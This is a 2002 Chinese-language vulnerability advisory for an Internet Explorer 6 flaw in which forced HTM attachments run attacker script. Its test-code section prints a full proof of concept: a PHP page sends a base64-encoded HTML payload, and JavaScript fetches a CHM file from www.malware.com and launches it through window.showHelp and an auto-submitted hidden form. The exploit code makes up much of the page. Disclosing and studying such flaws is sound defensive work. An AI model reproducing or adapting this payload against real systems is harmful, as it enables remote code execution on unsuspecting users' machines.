Microsoft Internet Explorer文件附件脚本可执行漏洞

发布时间：2002-08-21
更新时间：2002-08-21
严重程度：高
威胁程度：用户敏感信息泄露
错误类型：设计错误
利用方式：客户机模式

BUGTRAQ ID：5450

受影响系统

Microsoft Internet Explorer 6.0
   - Microsoft Windows 2000 Advanced Server
   - Microsoft Windows 2000 Advanced Server SP1
   - Microsoft Windows 2000 Advanced Server SP2
   - Microsoft Windows 2000 Datacenter Server
   - Microsoft Windows 2000 Datacenter Server SP1
   - Microsoft Windows 2000 Datacenter Server SP2
   - Microsoft Windows 2000 Professional
   - Microsoft Windows 2000 Professional SP1
   - Microsoft Windows 2000 Professional SP2
   - Microsoft Windows 2000 Server
   - Microsoft Windows 2000 Server SP1
   - Microsoft Windows 2000 Server SP2
   - Microsoft Windows 2000 Terminal Services
   - Microsoft Windows 2000 Terminal Services SP1
   - Microsoft Windows 2000 Terminal Services SP2
   - Microsoft Windows 98
   - Microsoft Windows 98SE
   - Microsoft Windows ME
   - Microsoft Windows NT Enterprise Server 4.0 SP6a
   - Microsoft Windows NT Server 4.0 SP6a
   - Microsoft Windows NT Terminal Server 4.0 SP6a
   - Microsoft Windows NT Workstation 4.0 SP6a

详细描述
Microsoft Internet Explorer 6存在漏洞，允许恶意文件附件在用户系统中执行。

HTM文件关联IE WEB浏览器，攻击者可以强迫使IE浏览器下载HTM文件，这个下载的HTM文件可以包含恶意攻击者提供的脚本执行，并在用户系统中执行。

测试代码
"http-equiv@excite.com" <http-equiv@malware.com>:

<?
function malware()
{
header("Content-type: text/html");
header("Content-Disposition: attachment");
echo base64_decode(
'PGltZyBkeW5zcmM9Imh0dHA6Ly93d3cubWFsd2FyZS5jb20vbW'.
'Fsd2FyZS9tYWx3YXJlLmNobSIgd2lkdGg9MSBoZWlnaHQ9MT4N'.
'Cg0KPFNDUklQVD4NCg0KLy8gNy4wMi4wMiBodHRwOi8vd3d3Lm'.
'1hbHdhcmUuY29tDQoNCi8vIHlvdSBtYXkgY29uc2lkZXIgd3Jp'.
'dGluZyBzZXZlcmFsIGxpbmVzDQovLyBpbiBjYXNlIG1hbHdhcm'.
'UuY2htIGFycml2ZXMgYXMgWzFdIG9yIFsyXSBldGMNCg0KZnVu'.
'Y3Rpb24gbWFsd2FyZSgpDQp7DQpzPWRvY3VtZW50LlVSTDsNCn'.
'BhdGg9cy5zdWJzdHIoLTAscy5sYXN0SW5kZXhPZigiXFwiKSk7'.
'DQpwYXRoPXVuZXNjYXBlKHBhdGgpOw0KZG9jdW1lbnQud3JpdG'.
'UoJzxGT1JNIG5hbWU9Im1hbHdhcmUiIEFDVElPTj0iamF2YXNj'.
'cmlwdDp3aW5kb3cuc2hvd0hlbHAoZG9jdW1lbnQuZm9ybXNbMF'.
'0uZWxlbWVudHNbMF0udmFsdWUpIj4nKTsNCmRvY3VtZW50Lndy'.
'aXRlKCc8Zm9ybT48aW5wdXQgdHlwZT0iaGlkZGVuIiAgc2l6ZT'.
'0iNDAiIG1heGxlbmd0aD0iODAiIHZhbHVlPSInK3BhdGgrJ1xc'.
'bWFsd2FyZVsxXS5jaG0iPjwvZm9ybT4nKTsNCnNldFRpbWVvdX'.
'QoJ2RvY3VtZW50Lm1hbHdhcmUuc3VibWl0KCknLDEwMDAwKTsN'.
'CiB9IA0Kc2V0VGltZW91dCgibWFsd2FyZSgpIiwyNTAwKTsgIA'.
'0KPC9TQ1JJUFQ+DQogDQoNCg=='.'');}
{ malware(); }
PHP ?>

<iframe src=<? echo $PHP_SELF ?> width=1 height=1>

<SCRIPT>

// 7.02.02 http://www.malware.com

function malware()
{
s=document.URL;
path=s.substr(-0,s.lastIndexOf(""));
path=unescape(path);
document.write('<FORM name="malware"
ACTION="javascript:window.showHelp(document.forms[0].elements
[0].value)">');
document.write('<form><input type="hidden" size="40" maxlength="80"
value="'+path+'malware[1].chm"></form>');
setTimeout('document.malware.submit()',10000);
}
setTimeout("malware()",2500);
</SCRIPT>

解决方案
无

相关信息
"http-equiv@excite.com" <http-equiv@malware.com>.
参考：http://online.securityfocus.com/archive/1/287124

最近严重漏洞

Microsoft Internet Explorer文件附件脚本可执行漏洞